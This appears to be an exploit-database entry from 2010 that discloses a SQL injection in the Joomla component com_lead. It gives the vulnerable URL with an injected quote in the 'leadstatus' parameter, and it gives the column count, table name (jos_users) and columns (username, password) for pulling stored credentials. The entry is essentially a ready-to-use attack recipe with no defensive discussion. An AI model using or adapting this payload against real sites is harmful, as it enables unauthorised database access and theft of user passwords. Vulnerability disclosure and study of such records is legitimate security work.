Joomla! Component com_lead - SQL Injection

Author: ByEge
type: webapps
platform: php
port: 
date_added: 2010-06-02 
date_updated: 2017-01-09 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

[TR] Title: Joomla Component com_lead SQL Injection

[TR] Date: 03.06.2010

[TR] Author: ByEge

[TR] Homepage: byege.blogspot.com

[TR] Vendor: http://www.leadya.co.il/

[TR] ExploiT :

[TR] index.php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1'

[TR] column number : 14
[TR] column name : username , password
[TR] table name : jos_users

[TR] Th4nks : KaTLiaMCi06 , Fantastik, MitolocyA, ISYAN